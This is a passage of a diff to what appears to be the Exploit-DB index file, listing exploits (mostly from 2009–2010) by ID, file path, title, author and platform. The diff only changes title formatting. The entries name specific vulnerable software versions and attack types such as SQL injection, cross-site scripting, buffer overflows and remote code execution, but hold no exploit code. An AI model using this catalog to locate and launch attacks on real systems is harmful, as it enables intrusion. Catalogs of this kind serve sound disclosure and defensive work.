2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",php,webapps,0 33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Parameter Cross-Site Scripting",2009-08-05,"599eme Man",php,webapps,0 33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x - 'posix-timers.c' NULL Pointer Dereference Denial of Service",2009-08-06,"Hiroshi Shimamoto",linux,dos,0 @@ -29933,10 +29928,10 @@ id,file,description,date,author,platform,type,port 33175,platforms/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (3)",2007-02-07,trevordixon,windows,dos,0 33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 - HTTP Basic Authentication NULL Pointer Dereference Denial Of Service",2009-08-18,"Brad Antoniewicz",linux,dos,0 33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0 -33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0 +33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0 33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,java,webapps,0 33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",multiple,webapps,0 -33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder Unicode Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0 +33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder - Unicode Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0 33182,platforms/multiple/dos/33182.txt,"Live For Speed S2 - Duplicate Join Packet Remote Denial of Service",2009-08-23,"Luigi Auriemma",multiple,dos,0 33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service (1)",2009-08-25,"Francis Provencher",novell,dos,0 33184,platforms/novell/dos/33184.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service (2)",2009-08-25,"Francis Provencher",novell,dos,0 @@ -29961,13 +29956,13 @@ id,file,description,date,author,platform,type,port 33207,platforms/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Buffer Overflow",2009-09-01,"optix hacker",windows,remote,0 33208,platforms/php/webapps/33208.txt,"MKPortal 1.x - Multiple BBCode HTML Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 33209,platforms/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 - Authentication Bypass",2009-09-03,Intevydis,jsp,webapps,0 -33210,platforms/multiple/remote/33210.txt,"HP Operations Manager Default Manager 8.1 Account Remote Security",2009-09-03,Intevydis,multiple,remote,0 -33211,platforms/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 Portal Default Manager Account Remote Security",2009-09-03,Intevydis,multiple,remote,0 +33210,platforms/multiple/remote/33210.txt,"HP Operations Manager - Default Manager 8.1 Account Remote Security",2009-09-03,Intevydis,multiple,remote,0 +33211,platforms/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 - Portal Default Manager Account Remote Security",2009-09-03,Intevydis,multiple,remote,0 33212,platforms/windows/remote/33212.rb,"Adobe Flash Player - Integer Underflow Remote Code Execution",2014-05-06,Metasploit,windows,remote,0 33213,platforms/windows/local/33213.rb,"Windows - NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",2014-05-06,Metasploit,windows,local,0 33214,platforms/php/webapps/33214.txt,"DvBBS 2.0 - 'boardrule.php' SQL Injection",2009-09-04,Securitylab.ir,php,webapps,0 33215,platforms/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 - User Profile HTML Injection",2009-08-26,IBM,multiple,remote,0 -33216,platforms/hardware/dos/33216.txt,"Check Point Endpoint Security Full Disk Encryption RDP Connection Denial of Service",2009-09-09,"Tim Medin",hardware,dos,0 +33216,platforms/hardware/dos/33216.txt,"Check Point Endpoint Security - Full Disk Encryption RDP Connection Denial of Service",2009-09-09,"Tim Medin",hardware,dos,0 33217,platforms/php/webapps/33217.txt,"Joomla! 'com_pressrelease' Component - 'id' Parameter SQL Injection",2009-09-10,Moudi,php,webapps,0 33218,platforms/php/webapps/33218.txt,"Joomla! 'com_mediaalert' Component - 'id' Parameter SQL Injection",2009-09-11,Moudi,php,webapps,0 33219,platforms/php/webapps/33219.txt,"Planet 2.0 - HTML Injection",2009-09-11,"Steve Kemp",php,webapps,0 @@ -29993,7 +29988,7 @@ id,file,description,date,author,platform,type,port 33239,platforms/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone - 'view_products.php' SQL Injection",2009-09-22,OoN_Boy,php,webapps,0 33240,platforms/php/webapps/33240.txt,"Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter SQL Injection",2009-09-22,OoN_Boy,php,webapps,0 33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter XSS",2009-09-22,OoN_Boy,php,webapps,0 -33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone SQL Injection",2009-09-23,OoN_Boy,php,webapps,0 +33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - SQL Injection",2009-09-23,OoN_Boy,php,webapps,0 33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0 33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 - register.php result Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 - index.php New User Creation CSRF",2009-11-10,"Andrew Horton",php,webapps,0 @@ -30023,7 +30018,7 @@ id,file,description,date,author,platform,type,port 33271,platforms/windows/dos/33271.py,"VMware Player and Workstation 6.5.3 - 'vmware-authd' Remote Denial of Service",2009-10-07,shinnai,windows,dos,0 33272,platforms/windows/remote/33272.txt,"Autodesk 3ds - Max Application Callbacks Arbitrary Command Execution",2009-10-23,"Sebastian Tello",windows,remote,0 33264,platforms/windows/remote/33264.txt,"Microsoft Internet Explorer 8 - X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0 -33273,platforms/windows/remote/33273.scn,"Autodesk Softimage 7.0 Scene TOC File Remote Code Execution",2009-11-23,"Diego Juarez",windows,remote,0 +33273,platforms/windows/remote/33273.scn,"Autodesk Softimage 7.0 Scene - .TOC File Remote Code Execution",2009-11-23,"Diego Juarez",windows,remote,0 33590,platforms/php/webapps/33590.txt,"Joomla! AutartiTarot Component - Directory Traversal",2010-02-01,B-HUNT3|2,php,webapps,0 33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Command Directory Traversal",2010-02-15,fb1h2s,windows,remote,0 33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 - search.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 @@ -30100,7 +30095,7 @@ id,file,description,date,author,platform,type,port 33366,platforms/php/webapps/33366.txt,"WordPress Trashbin Plugin 0.1 - 'mtb_undelete' Parameter Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0 33367,platforms/php/webapps/33367.txt,"FireStats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 33368,platforms/php/webapps/33368.html,"FireStats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 -33370,platforms/multiple/webapps/33370.html,"ElasticSearch Remote Code Execution",2014-05-15,"Jeff Geiger",multiple,webapps,0 +33370,platforms/multiple/webapps/33370.html,"ElasticSearch - Remote Code Execution",2014-05-15,"Jeff Geiger",multiple,webapps,0 33371,platforms/php/webapps/33371.txt,"WordPress WP-Cumulus Plugin 1.x - 'tagcloud.swf' Cross-Site Scripting",2009-11-09,MustLive,php,webapps,0 33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for WordPress CAPTCHA - Security Bypass",2009-11-13,MustLive,php,webapps,0 33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 WordPress Plugin - Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0 @@ -30183,7 +30178,7 @@ id,file,description,date,author,platform,type,port 33486,platforms/php/webapps/33486.txt,"@lex Guestbook 5.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0 33487,platforms/php/webapps/33487.txt,"PhPepperShop 2.5 - 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting",2010-01-12,Crux,php,webapps,0 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 - '$_SERVER['PHP_SELF']' Variable Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0 -33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33493,platforms/multiple/webapps/33493.txt,"Mayan-EDms web-based document management OS system - Multiple Stored XSS",2014-05-24,"Dolev Farhi",multiple,webapps,0 33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - books.cgi Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0 @@ -30192,12 +30187,12 @@ id,file,description,date,author,platform,type,port 33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component - 'catid' Parameter SQL Injection",2010-01-31,snakespc,php,webapps,0 33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow",2009-12-31,"Francis Provencher",hardware,dos,0 33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 - Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 -33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33499,platforms/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33500,platforms/multiple/remote/33500.txt,"mini_httpd 1.18 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 -33502,platforms/windows/remote/33502.txt,"Yaws 1.55 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 -33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 +33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33504,platforms/multiple/remote/33504.txt,"Boa Webserver 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33505,platforms/php/webapps/33505.txt,"Docmint 1.0/2.1 - 'id' Parameter Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0 33506,platforms/multiple/dos/33506.py,"Oracle Database - Remote Listener Memory Corruption",2010-01-12,"Dennis Yurichev",multiple,dos,0 @@ -30253,7 +30248,7 @@ id,file,description,date,author,platform,type,port 33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents 2.0.3 - Authentication Bypass / Multiple SQL Injection",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection",2010-01-20,Ctacok,php,webapps,0 33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution",2010-01-21,"Lostmon Lords",windows,remote,0 -33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow",2010-01-21,Intevydis,multiple,remote,0 +33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 - Digest Authentication Remote Buffer Overflow",2010-01-21,Intevydis,multiple,remote,0 33554,platforms/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,linux,remote,0 33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0 33556,platforms/multiple/dos/33556.rb,"Wireshark CAPWAP Dissector - Denial of Service (Metasploit)",2014-05-28,j0sm1,multiple,dos,5247 @@ -30262,16 +30257,16 @@ id,file,description,date,author,platform,type,port 33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service",2010-01-22,Intevydis,multiple,dos,0 33560,platforms/multiple/dos/33560.txt,"Sun Java System Web Server 6.1/7.0 WebDAV Format String",2010-01-22,Intevydis,multiple,dos,0 33561,platforms/php/webapps/33561.txt,"OpenX 2.6.1 - SQL Injection",2010-01-22,AndySoon,php,webapps,0 -33562,platforms/multiple/remote/33562.html,"Google Chrome 3.0 Style Sheet Redirection Information Disclosure",2010-01-22,"Cesar Cerrudo",multiple,remote,0 +33562,platforms/multiple/remote/33562.html,"Google Chrome 3.0 - Style Sheet Redirection Information Disclosure",2010-01-22,"Cesar Cerrudo",multiple,remote,0 33563,platforms/windows/remote/33563.txt,"Apple Safari 4.0.4 - Style Sheet Redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",windows,remote,0 33564,platforms/jsp/webapps/33564.txt,"Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,jsp,webapps,0 33565,platforms/php/webapps/33565.txt,"PunBB 1.3 - 'viewtopic.php' Cross-Site Scripting",2010-01-24,s4r4d0,php,webapps,0 33566,platforms/php/webapps/33566.txt,"Joomla! 3D Cloud 'tagcloud.swf' - Cross-Site Scripting",2010-01-26,MustLive,php,webapps,0 33567,platforms/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x - 'translation' Cross-Site Scripting",2010-01-26,"Matias Pablo Brutti",hardware,remote,0 -33568,platforms/hardware/remote/33568.txt,"Novatel Wireless MiFi 2352 Password Information Disclosure",2010-01-17,"Alejandro Ramos",hardware,remote,0 +33568,platforms/hardware/remote/33568.txt,"Novatel Wireless MiFi 2352 - Password Information Disclosure",2010-01-17,"Alejandro Ramos",hardware,remote,0 33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage 3.0.2 - 'servercert' Parameter Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote,0 33570,platforms/multiple/remote/33570.txt,"SAP BusinessObjects 12 - URI Redirection / Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote,0 -33571,platforms/linux/dos/33571.txt,"PostgreSQL 'bitsubstr' Buffer Overflow",2010-01-27,Intevydis,linux,dos,0 +33571,platforms/linux/dos/33571.txt,"PostgreSQL - 'bitsubstr' Buffer Overflow",2010-01-27,Intevydis,linux,dos,0 33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",linux,dos,0 33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component - 'gamblingEvent' Parameter SQL Injection",2010-02-01,md.r00t,php,webapps,0 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0 @@ -30294,11 +30289,11 @@ id,file,description,date,author,platform,type,port 33613,platforms/php/webapps/33613.txt,"WordPress Participants Database 1.5.4.8 Plugin - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80 33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Local Root Exploit",2014-06-02,"Sebastian Krahmer",linux,local,0 33615,platforms/multiple/remote/33615.txt,"JDownloader - 'JDExternInterface.java' Remote Code Execution",2010-02-08,apoc,multiple,remote,0 -33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 Space String Remote File Disclosure",2010-02-08,"Pouya Daneshmand",multiple,remote,0 +33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 - Space String Remote File Disclosure",2010-02-08,"Pouya Daneshmand",multiple,remote,0 33617,platforms/php/webapps/33617.txt,"Aflam Online 1.0 - 'index.php' SQL Injection",2010-02-08,alnjm33,php,webapps,0 33618,platforms/php/webapps/33618.txt,"Zen Time Tracking 2.2 - Multiple SQL Injection",2010-02-08,"cr4wl3r ",php,webapps,0 33619,platforms/php/webapps/33619.txt,"VideoDB 3.0.3 - 'login.php' Cross-Site Scripting",2010-02-08,vr,php,webapps,0 -33620,platforms/linux/remote/33620.txt,"Helix Player 11.0.2 Encoded URI Processing Buffer Overflow",2007-07-03,gwright,linux,remote,0 +33620,platforms/linux/remote/33620.txt,"Helix Player 11.0.2 - Encoded URI Processing Buffer Overflow",2007-07-03,gwright,linux,remote,0 33621,platforms/php/webapps/33621.txt,"vBulletin Adsense Component - 'viewpage.php' SQL Injection",2010-02-09,JIKO,php,webapps,0 33622,platforms/linux/remote/33622.txt,"Accellion File Transfer - Appliance web_client_user_guide.html lang Parameter Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0 33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Local Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0 @@ -30311,7 +30306,7 @@ id,file,description,date,author,platform,type,port 33630,platforms/ios/webapps/33630.txt,"TigerCom My Assistant 1.1 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080 33631,platforms/ios/webapps/33631.txt,"AllReader 1.0 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080 33632,platforms/ios/webapps/33632.txt,"Bluetooth Photo-File Share 2.1 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080 -33633,platforms/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 persistent XSS",2014-06-03,Peru,windows,webapps,0 +33633,platforms/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 - persistent XSS",2014-06-03,Peru,windows,webapps,0 33644,platforms/php/webapps/33644.txt,"Basic-CMS - 'nav_id' Parameter Cross-Site Scripting",2010-02-12,Red-D3v1L,php,webapps,0 33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC - SQL Injection / HTML Injection",2009-09-17,"Jeff Channell",php,webapps,0 33642,platforms/windows/remote/33642.html,"Symantec Multiple Products - Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 @@ -30330,10 +30325,10 @@ id,file,description,date,author,platform,type,port 33658,platforms/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,php,webapps,0 33659,platforms/php/webapps/33659.txt,"Joomla! 'com_recipe' Component - Multiple SQL Injection",2010-02-20,FL0RiX,php,webapps,0 33660,platforms/php/webapps/33660.txt,"vBulletin 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-20,indoushka,php,webapps,0 -33661,platforms/php/webapps/33661.txt,"Galerie Dezign-Box Multiple Input Validation Vulnerabilities",2010-02-22,indoushka,php,webapps,0 +33661,platforms/php/webapps/33661.txt,"Galerie Dezign-Box - Multiple Input Validation Vulnerabilities",2010-02-22,indoushka,php,webapps,0 33662,platforms/windows/remote/33662.txt,"WampServer 2.0i - lang Parameter Cross-Site Scripting",2010-02-22,"Gjoko Krstic",windows,remote,0 -33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection",2010-02-19,"Sjoerd Resink",multiple,remote,0 -33664,platforms/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 Style Sheet Redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote,0 +33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 - Portlet Palette Search HTML Injection",2010-02-19,"Sjoerd Resink",multiple,remote,0 +33664,platforms/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 - Style Sheet Redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote,0 33665,platforms/php/webapps/33665.txt,"Softbiz Jobs - 'sbad_type' Parameter Cross-Site Scripting",2010-02-23,"pratul agrawal",php,webapps,0 33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow PoC",2014-06-11,"Gabor Seljan",windows,dos,0 33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products - Login Page Cross-Site Scripting",2010-02-25,"Oren Hafif",jsp,webapps,0 @@ -30351,7 +30346,7 @@ id,file,description,date,author,platform,type,port 33684,platforms/php/webapps/33684.txt,"Blax Blog 0.1 - 'girisyap.php' SQL Injection",2010-03-01,"cr4wl3r ",php,webapps,0 33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 - '_SESSION[dede_admin_id]' Parameter Authentication Bypass",2010-03-01,"Wolves Security Team",php,webapps,0 33686,platforms/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 - 'readme.nsf' Cross-Site Scripting",2010-03-02,"Nahuel Grisolia",multiple,remote,0 -33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQms Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0 +33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0 33688,platforms/php/webapps/33688.txt,"Discuz! 6.0 - 'uid' Parameter Cross-Site Scripting",2010-03-02,"lis cker",php,webapps,0 33689,platforms/multiple/remote/33689.as,"Adobe Flash Player 10.1.51 - Local File Access Information Disclosure",2010-03-03,"lis cker",multiple,remote,0 33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 - Remote File Upload",2010-03-03,indoushka,php,webapps,0 @@ -30427,7 +30422,7 @@ id,file,description,date,author,platform,type,port 33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard - (.yuv) Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos,0 33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting / SQL Injection",2010-03-18,d3v1l,php,webapps,0 33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0 -33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 GET Request Format String Denial Of Service",2010-03-20,Rick2600,windows,dos,0 +33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Request Format String Denial Of Service",2010-03-20,Rick2600,windows,dos,0 33779,platforms/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open Redirection",2010-03-22,Lament,jsp,webapps,0 33780,platforms/multiple/remote/33780.txt,"IBM Lotus Notes 6.5.x - 'names.nsf' Cross-Site Scripting",2010-03-19,Lament,multiple,remote,0 33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusion",2010-03-23,eidelweiss,php,webapps,0 @@ -30437,7 +30432,7 @@ id,file,description,date,author,platform,type,port 33785,platforms/jsp/webapps/33785.txt,"agXchange ESM - 'ucquerydetails.jsp' Cross-Site Scripting",2010-03-23,Lament,jsp,webapps,0 33786,platforms/multiple/remote/33786.txt,"Cafu 9.06 - Multiple Remote Vulnerabilities",2010-03-23,"Luigi Auriemma",multiple,remote,0 33788,platforms/php/webapps/33788.pl,"phpAuthent 0.2.1 - 'useradd.php' Multiple HTML Injection Vulnerabilities",2010-03-23,Yoyahack,php,webapps,0 -33789,platforms/multiple/remote/33789.rb,"Java Debug Wire Protocol Remote Code Execution",2014-06-17,Metasploit,multiple,remote,8000 +33789,platforms/multiple/remote/33789.rb,"Java - Debug Wire Protocol Remote Code Execution",2014-06-17,Metasploit,multiple,remote,8000 33790,platforms/windows/remote/33790.rb,"Easy File Management Web Server - Stack Buffer Overflow",2014-06-17,Metasploit,windows,remote,80 33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit",2014-06-17,Metasploit,arm,local,0 33792,platforms/hardware/webapps/33792.txt,"Motorola SBG901 Wireless Modem - CSRF",2014-06-17,"Blessen Thomas",hardware,webapps,0 @@ -30446,8 +30441,8 @@ id,file,description,date,author,platform,type,port 33795,platforms/php/webapps/33795.txt,"Joomla! 'com_aml_2' Component - 'art' Parameter SQL Injection",2010-03-23,Metropolis,php,webapps,0 33796,platforms/php/webapps/33796.txt,"Joomla! 'com_cb' Component - 'cat' Parameter SQL Injection",2010-03-23,"DevilZ TM",php,webapps,0 33797,platforms/php/webapps/33797.txt,"Joomla! 'com_jresearch' Component - 'controller' Parameter Local File Inclusion",2010-03-24,"Chip d3 bi0s",php,webapps,0 -33798,platforms/linux/remote/33798.html,"Mozilla Firefox 3.6 Image Preloading Content-Policy Check Security Bypass",2010-03-18,"Josh Soref",linux,remote,0 -33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0 +33798,platforms/linux/remote/33798.html,"Mozilla Firefox 3.6 - Image Preloading Content-Policy Check Security Bypass",2010-03-18,"Josh Soref",linux,remote,0 +33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0 33800,platforms/multiple/dos/33800.html,"Mozilla Firefox 3.6 - 'gfxTextRun::SanitizeGlyphRuns()' Remote Memory Corruption",2010-03-24,"Jesse Ruderman",multiple,dos,0 33801,platforms/linux/dos/33801.txt,"Mozilla Firefox/Thunderbird/Seamonkey - Multiple Memory Corruption Vulnerabilities",2010-03-24,"Bob Clary",linux,dos,0 33802,platforms/multiple/remote/33802.txt,"Jenkins Software RakNet 3.72 - Remote Integer Underflow",2010-03-25,"Luigi Auriemma",multiple,remote,0 @@ -30465,14 +30460,14 @@ id,file,description,date,author,platform,type,port 33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps,0 33814,platforms/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Parameter Cross-Site Scripting",2010-03-31,garwga,php,webapps,0 33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Parameter Cross-Site Scripting",2010-03-31,"CONIX Security",php,webapps,0 -33816,platforms/multiple/remote/33816.pl,"Miranda IM 0.8.16 Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote,0 -33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server Buffer Overflow",2014-06-19,Metasploit,windows,remote,8080 +33816,platforms/multiple/remote/33816.pl,"Miranda IM 0.8.16 - Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote,0 +33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server - Buffer Overflow",2014-06-19,Metasploit,windows,remote,8080 33818,platforms/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",php,webapps,80 33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0 33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 - 'nid' Parameter Multiple Local File Inclusion",2010-04-07,mat,php,webapps,0 33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug - Multiple Local File Inclusion",2010-02-24,ITSecTeam,php,webapps,0 33822,platforms/hardware/webapps/33822.sh,"D-link DSL-2760U-E1 - Persistent XSS",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0 -33852,platforms/windows/remote/33852.txt,"HTTP 1.1 GET Request Directory Traversal",2010-06-20,chr1x,windows,remote,0 +33852,platforms/windows/remote/33852.txt,"HTTP 1.1 - GET Request Directory Traversal",2010-06-20,chr1x,windows,remote,0 33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 - 'module' Parameter Cross-Site 